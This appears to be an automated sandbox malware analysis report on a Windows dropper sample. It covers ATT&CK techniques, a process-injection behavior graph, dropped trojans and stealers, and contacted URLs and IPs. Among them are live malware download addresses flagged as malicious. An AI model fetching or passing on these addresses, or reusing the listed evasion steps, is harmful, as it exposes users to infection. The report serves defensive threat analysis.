                  Process Injection
                  1
                  DLL Side-Loading
                  Cached Domain Credentials561
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote Services1
                  PowerShell
                  Startup Items11
                  Scheduled Task/Job
                  1
                  Bypass User Account Control
                  DCSync3
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                  Registry Run Keys / Startup Folder
                  131
                  Masquerading
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                  Modify Registry
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron561
                  Virtualization/Sandbox Evasion
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Access Token Manipulation
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task712
                  Process Injection
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Hidden Files and Directories
                  GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1447097 Sample: lgX7lgUL1w.exe Startdate: 24/05/2024 Architecture: WINDOWS Score: 100 169 Multi AV Scanner detection for domain / URL 2->169 171 Found malware configuration 2->171 173 Malicious sample detected (through community Yara rule) 2->173 175 17 other signatures 2->175 12 lgX7lgUL1w.exe 3 2->12         started        16 svchost.exe 2->16         started        18 svchost.exe 2->18         started        20 11 other processes 2->20 process3 dnsIp4 135 C:\Users\user\lgX7lgUL1w.exe, PE32+ 12->135 dropped 209 Drops PE files to the user root directory 12->209 211 Writes to foreign memory regions 12->211 213 Allocates memory in foreign processes 12->213 221 3 other signatures 12->221 23 AddInProcess32.exe 15 162 12->23         started        28 powershell.exe 23 12->28         started        30 conhost.exe 12->30         started        215 Tries to delay execution (extensive OutputDebugStringW loop) 16->215 217 Query firmware table information (likely to detect VMs) 18->217 157 20.101.57.9 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->157 159 20.190.159.4 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->159 161 4 other IPs or domains 20->161 219 Changes security center settings (notifications, updates, antivirus, firewall) 20->219 32 WerFault.exe 20->32         started        file5 signatures6 process7 dnsIp8 163 5.42.66.47 RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU Russian Federation 23->163 165 104.192.108.17 QIHOOBeijingQihuTechnologyCompanyLimitedCN United States 23->165 167 10 other IPs or domains 23->167 127 C:\Users\...\z7qYuSNnmN1T20mVDPQyJKNf.exe, MS-DOS 23->127 dropped 129 C:\Users\...\xJOdjN6fVDYC0Ta4cXD9JBiF.exe, PE32 23->129 dropped 131 C:\Users\...\xHjBfoMXM1Bms4i9lirVpf5B.exe, PE32 23->131 dropped 133 120 other malicious files 23->133 dropped 201 Drops script or batch files to the startup folder 23->201 203 Creates HTML files with .exe extension (expired dropper behavior) 23->203 205 Writes many files with high entropy 23->205 34 c12YwoiQ34lE0LgBRkxJOClX.exe 23->34         started        39 iYU7jmLL0jPLxgjctxjq1ReZ.exe 23->39         started        41 PZ3hKWPffUrXuh6Gjn77Ivv1.exe 23->41         started        45 2 other processes 23->45 207 Loading BitLocker PowerShell Module 28->207 43 conhost.exe 28->43         started        file9 signatures10 process11 dnsIp12 137 176.111.174.109 WILWAWPL Russian Federation 34->137 139 87.240.132.78 VKONTAKTE-SPB-AShttpvkcomRU Russian Federation 34->139 145 17 other IPs or domains 34->145 103 C:\Users\...\xCrl2X_yjihZJLjlfNXcaGsm.exe, PE32 34->103 dropped 105 C:\Users\...\wPxPcov2_iRQt91bGzfyQLn0.exe, PE32 34->105 dropped 107 C:\Users\...\sCKRGnz9ufcbydLPdvMHEgfk.exe, PE32 34->107 dropped 117 26 other malicious files 34->117 dropped 177 Query firmware table information (likely to detect VMs) 34->177 179 Drops PE files to the document folder of the user 34->179 181 Tries to detect sandboxes and other dynamic analysis tools (window names) 34->181 191 11 other signatures 34->191 109 C:\Users\user\AppData\Local\...\notepad.exe, PE32+ 39->109 dropped 119 4 other malicious files 39->119 dropped 47 Install.exe 39->47         started        183 Detected unpacking (changes PE section rights) 41->183 185 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 41->185 187 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 41->187 193 3 other signatures 41->193 50 explorer.exe 41->50 injected 141 108.156.60.116 AMAZON-02US United States 45->141 143 108.156.60.18 AMAZON-02US United States 45->143 147 10 other IPs or domains 45->147 111 C:\Users\user\Pictures\360TS_Setup.exe.P2P, PE32 45->111 dropped 113 C:\Users\user\...\360TS_Setup.exe (copy), PE32 45->113 dropped 115 C:\Users\user\AppData\Local\...\360P2SP.dll, PE32 45->115 dropped 189 Writes many files with high entropy 45->189 54 WerFault.exe 45->54         started        file13 signatures14 process15 dnsIp16 227 Multi AV Scanner detection for dropped file 47->227 229 Uses schtasks.exe or at.exe to add and modify task schedules 47->229 231 Modifies Windows Defender protection settings 47->231 56 cmd.exe 47->56         started        59 forfiles.exe 47->59         started        61 schtasks.exe 47->61         started        149 190.224.203.37 TelecomArgentinaSAAR Argentina 50->149 151 66.85.156.89 SSASN2US United States 50->151 155 2 other IPs or domains 50->155 121 C:\Users\user\AppData\Roaming\hvfsedh, PE32 50->121 dropped 123 C:\Users\user\AppData\Local\Temp\FFE8.exe, PE32 50->123 dropped 125 C:\Users\user\AppData\Local\TempD0F.exe, PE32 50->125 dropped 233 System process connects to network (likely due to code injection or exploit) 50->233 235 Benign windows process drops PE files 50->235 237 Hides that the sample has been downloaded from the Internet (zone.identifier) 50->237 153 13.89.179.12 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 54->153 file17 signatures18 process19 signatures20 195 Suspicious powershell command line found 56->195 197 Uses cmd line tools excessively to alter registry or file data 56->197 199 Modifies Windows Defender protection settings 56->199 63 forfiles.exe 56->63         started        66 forfiles.exe 56->66         started        68 forfiles.exe 56->68         started        76 3 other processes 56->76 70 cmd.exe 59->70         started        72 conhost.exe 59->72         started        74 conhost.exe 61->74         started        process21 signatures22 239 Modifies Windows Defender protection settings 63->239 78 cmd.exe 63->78         started        81 cmd.exe 66->81         started        83 cmd.exe 68->83         started        241 Suspicious powershell command line found 70->241 85 powershell.exe 70->85         started        87 cmd.exe 76->87         started        89 cmd.exe 76->89         started        process23 signatures24 223 Uses cmd line tools excessively to alter registry or file data 78->223 91 reg.exe 78->91         started        93 reg.exe 81->93         started        95 reg.exe 83->95         started        97 WMIC.exe 85->97         started        99 reg.exe 87->99         started        225 Suspicious powershell command line found 89->225 101 powershell.exe 89->101         started        process25

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  lgX7lgUL1w.exe21%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exe100%AviraHEUR/AGEN.1311176
                  C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exe100%AviraHEUR/AGEN.1311176
                  C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exe100%AviraHEUR/AGEN.1314708
                  C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe100%AviraHEUR/AGEN.1314708
                  C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exe100%AviraHEUR/AGEN.1314708
                  C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe100%AviraHEUR/AGEN.1314708
                  C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe18%ReversingLabs
                  C:\Users\user\AppData\Local\3wIIRe1QiHmGmyDfkt1MdfjR.exe4%ReversingLabs
                  C:\Users\user\AppData\Local\AFlhDPRBYXSdsXlIscLwpPBI.exe4%ReversingLabs
                  C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exe18%ReversingLabs
                  C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exe18%ReversingLabs
                  C:\Users\user\AppData\Local\H0hJPxhIO3F6BQNxVzuoHmfd.exe4%ReversingLabs
                  C:\Users\user\AppData\Local\IMmyv1eSkv8WoF4sKRLh3j87.exe4%ReversingLabs
                  C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe18%ReversingLabs
                  C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe53%ReversingLabsWin32.Trojan.Neoreblamy
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exe32%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exe34%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exe46%ReversingLabsWin64.Trojan.Privateloader
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exe92%ReversingLabsWin64.Trojan.Privateloader
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exe32%ReversingLabs
                  C:\Users\user\AppData\Local\O6FJxszjCn1zgUzc3ngkew5Q.exe4%ReversingLabs
                  C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe53%ReversingLabsWin32.Trojan.Neoreblamy
                  C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exe53%ReversingLabsWin32.Trojan.Neoreblamy
                  C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe75%ReversingLabsWin32.Trojan.Neoreblamy
                  C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\atieah64.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\auditpol.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\bash.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\notepad.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\ED0F.exe96%ReversingLabsWin32.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\Temp\{F0567900-3BBD-4439-A130-BA90A759BDE5}.tmp\360P2SP.dll3%ReversingLabs
                  C:\Users\user\AppData\Local\VEH3hOo7SH8Curivn14XA2XL.exe18%ReversingLabs
                  C:\Users\user\AppData\Local\aqGWEPmkK0B9sJyfEBtpOpuJ.exe18%ReversingLabs
                  C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exe53%ReversingLabsWin32.Trojan.Neoreblamy
                  C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe53%ReversingLabsWin32.Trojan.Neoreblamy
                  C:\Users\user\AppData\Local\hmtNBhlQWScQGAc2r9fH2laz.exe4%ReversingLabs
                  C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exe53%ReversingLabsWin32.Trojan.Neoreblamy
                  C:\Users\user\AppData\Local\j19ppip6hQlQefTQJUWb1E5Y.exe18%ReversingLabs
                  C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe53%ReversingLabsWin32.Trojan.Neoreblamy
                  C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exe53%ReversingLabsWin32.Trojan.Neoreblamy
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://api.msn.com:443/v1/news/Feed/Windows?t0%URL Reputationsafe
                  https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/http0%URL Reputationsafe
                  https://wns.windows.com/0%URL Reputationsafe
                  https://dev.virtualearth.net/REST/v1/Imagery/Copyright/0%URL Reputationsafe
                  http://Passport.NET/tb_0%URL Reputationsafe
                  http://www.symauth.com/cps0(0%URL Reputationsafe
                  https://dev.virtualearth.net/REST/v1/Locations0%URL Reputationsafe
                  https://dynamic.t0%URL Reputationsafe
                  http://www.symauth.com/rpa000%URL Reputationsafe
                  https://dev.virtualearth.net/REST/v1/Routes/Transit0%URL Reputationsafe
                  https://dev.virtualearth.net/REST/v1/Routes/Driving0%URL Reputationsafe
                  https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf0%URL Reputationsafe
                  https://login.microsoftonline.com/ppsecure/DeviceQuery.srf0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it0%URL Reputationsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                  http://5.42.66.10/download/th/retail.phphp0%Avira URL Cloudsafe
                  https://signup.live.com/signup.aspx0%URL Reputationsafe
                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806010%URL Reputationsafe
                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806030%URL Reputationsafe
                  https://api.myip.com/0%URL Reputationsafe
                  https://dev.ditu.live.com/REST/v1/Transit/Stops/0%URL Reputationsafe
                  http://45.129.96.86:80/file/update.exe100%Avira URL Cloudmalware
                  https://kurd.computer/0%Avira URL Cloudsafe
                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806050%URL Reputationsafe
                  https://account.live.com/inlinesignup.aspx?iww=1&amp;id=806040%URL Reputationsafe
                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?0%URL Reputationsafe
                  http://www.360totalsecurity.com/en/privacy.htmlin0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types0%Avira URL Cloudsafe
                  https://yip.su/redirect-0%Avira URL Cloudsafe
                  http://guteyr.cc/tmp/index.php0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types0%VirustotalBrowse
                  http://www.360totalsecurity.com/en/privacy.htmlin0%VirustotalBrowse
                  https://yip.su/redirect-8%VirustotalBrowse
                  http://5.42.66.10/download/th/retail.phphp7%VirustotalBrowse
                  http://guteyr.cc/tmp/index.php3%VirustotalBrowse
                  http://45.129.96.86:80/file/update.exe20%VirustotalBrowse
                  http://Passport.NET/tbA0%VirustotalBrowse
                  https://vk.com:80/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzK0%Avira URL Cloudsafe
                  http://Passport.NET/tbA0%Avira URL Cloudsafe
                  https://a-dira.net/images/upd2.php$n0%Avira URL Cloudsafe
                  https://vk.com0%Avira URL Cloudsafe
                  https://vk.com:80/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzK0%VirustotalBrowse
                  https://kurd.computer/4%VirustotalBrowse
                  https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.0%Avira URL Cloudsafe
                  https://aka.ms/dotnet-core-applaunch?framework=&framework_version=missing_runtime=true&arch=&rid=0%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabe0%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabg0%Avira URL Cloudsafe
                  http://www.360totalsecurity.com/en/privacy.htmlim0%Avira URL Cloudsafe
                  https://vk.com1%VirustotalBrowse
                  https://free.360totalsecurity.com0%Avira URL Cloudsafe
                  http://www.360totalsecurity.com/en/license.htmlz(0%Avira URL Cloudsafe
                  http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe3600%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabe0%VirustotalBrowse
                  http://www.autoitscript.com/autoit3/J0%Avira URL Cloudsafe
                  http://www.360totalsecurity.com/en/privacy.htmlim0%VirustotalBrowse
                  http://schemas.xmlsoap.org/ws/2005/02/sc40%Avira URL Cloudsafe
                  https://free.360totalsecurity.com2%VirustotalBrowse
                  http://www.autoitscript.com/autoit3/J0%VirustotalBrowse
                  http://down.360safe.com/setup.exehttp://down.360safe.com/setupbeta.exe3600%VirustotalBrowse
                  http://s.360totalsecurity.com/safei18n/ins.htm?mid=%s&ver=%s&lan=%s&os=%s&ch=%s&sch=%s&ue=%sMainDlg70%Avira URL Cloudsafe
                  http://crl.ver)0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/sc40%VirustotalBrowse
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cabSE.ca0%Avira URL Cloudsafe
                  https://aka.ms/dotnet-core-applaunch?framework=&framework_version=missing_runtime=true&arch=&rid=0%VirustotalBrowse
                  http://www.360totalsecurity.comIDS_LOAD_P2SP_ERROR/tswin10/tsewin10IDS_UPDATE_QUESTIONIDS_UPDATE_WAR0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/sc(0%Avira URL Cloudsafe
                  http://s.360totalsecurity.com/safei18n/ins.htm?mid=%s&ver=%s&lan=%s&os=%s&ch=%s&sch=%s&ue=%sMainDlg70%VirustotalBrowse
                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue0%Avira URL Cloudsafe
                  https://a-dira.net/images/upd2.php0%Avira URL Cloudsafe
                  http://s.360safe.com/safei18n/ins_err.htm?ng0%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Rel.cabSE.ca0%VirustotalBrowse
                  http://5.42.66.10/download/th/space.phpLt0%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TSE.cabg0%VirustotalBrowse
                  http://schemas.xmlsoap.org/ws/2005/02/sc(0%VirustotalBrowse
                  http://www.360totalsecurity.com/en/license.htmla=950%Avira URL Cloudsafe
                  https://monoblocked.com:80/525403/setup.exehudp(0%Avira URL Cloudsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/Issueue0%VirustotalBrowse
                  https://ipinfo.io/widget/demo/8.46.123.1750%Avira URL Cloudsafe
                  http://www.360totalsecurity.com/$:0%Avira URL Cloudsafe
                  http://www.360totalsecurity.com/zh-cn/license.htmlins0%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cab0%Avira URL Cloudsafe
                  https://chrome.google.com/webstore/detail/360-internet-protection/glcimepnljoholdmjchkloafkggfoijhht0%Avira URL Cloudsafe
                  http://185.172.180%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabp0%Avira URL Cloudsafe
                  http://www.360totalsecurity.com/zh-cn/license.htmlins0%VirustotalBrowse
                  http://www.360totalsecurity.com/en/privacy.html%90%Avira URL Cloudsafe
                  http://www.360totalsecurity.com/en/privacy.htmlF:0%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabz0%Avira URL Cloudsafe
                  http://www.360totalsecurity.com/en/privacy.html%90%VirustotalBrowse
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cab0%VirustotalBrowse
                  http://www.360totalsecurity.com/zh-cn/license.htmla=70%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabp0%VirustotalBrowse
                  https://f.123654987.xyz/525403/setup.exe_100%Avira URL Cloudmalware
                  http://185.172.180%VirustotalBrowse
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cabv0%Avira URL Cloudsafe
                  https://login.microsoftonline.com/ppsecure/devicechangecredential.srfen0%Avira URL Cloudsafe
                  http://iup.360safe.com/iv3/pc/360safe/360TS_Setup_For_Mini_Win10TS.cab.q0%Avira URL Cloudsafe
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://guteyr.cc/tmp/index.phptrue
                  • 3%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Typesc12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426040285.000000000582C000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1430346079.0000000005F14000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420334429.0000000005373000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417014257.0000000005150000.00000004.00000020.00020000.00000000.sdmp, o2i3jroi23joj23ikrjokij3oroi[1].exe.19.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://kurd.computer/c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 4%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://5.42.66.10/download/th/retail.phphpc12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 00000024.00000000.1373594900.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.360totalsecurity.com/en/privacy.htmlinxJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1286798746.0000000002364000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1287059393.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284177603.0000000002365000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1282882303.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1283481251.0000000002362000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1279675967.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1290130727.0000000002351000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1284229883.0000000002351000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://45.129.96.86:80/file/update.exeexplorer.exe, 00000024.00000003.2275944266.0000000011531000.00000004.00000001.00020000.00000000.sdmptrue
                  • 20%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000024.00000000.1373594900.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  https://yip.su/redirect-AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C4D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002990000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C77000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C87000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B2D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.000000000299B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CC5000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002A3F000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B92000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B04000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr, OEf7asb27AljF1U8YK72cN6l.exe.5.drfalse
                  • 8%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://Passport.NET/tbAsvchost.exe, 00000034.00000003.1503483215.000001F4D8F78000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://vk.com:80/doc5294803_669772653?hash=MJgzq2uHp4YpxKcxqN6PbWIkURu6KtrsshfCpnqBzv8&dl=rLosXazzKc12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1409059874.0000000000644000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414285258.0000000000644000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://a-dira.net/images/upd2.php$nAddInProcess32.exe, 00000005.00000002.2604784378.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2604784378.0000000002D19000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://vk.comc12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1482426691.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.00000000043CE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1477395749.0000000004471000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004470000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
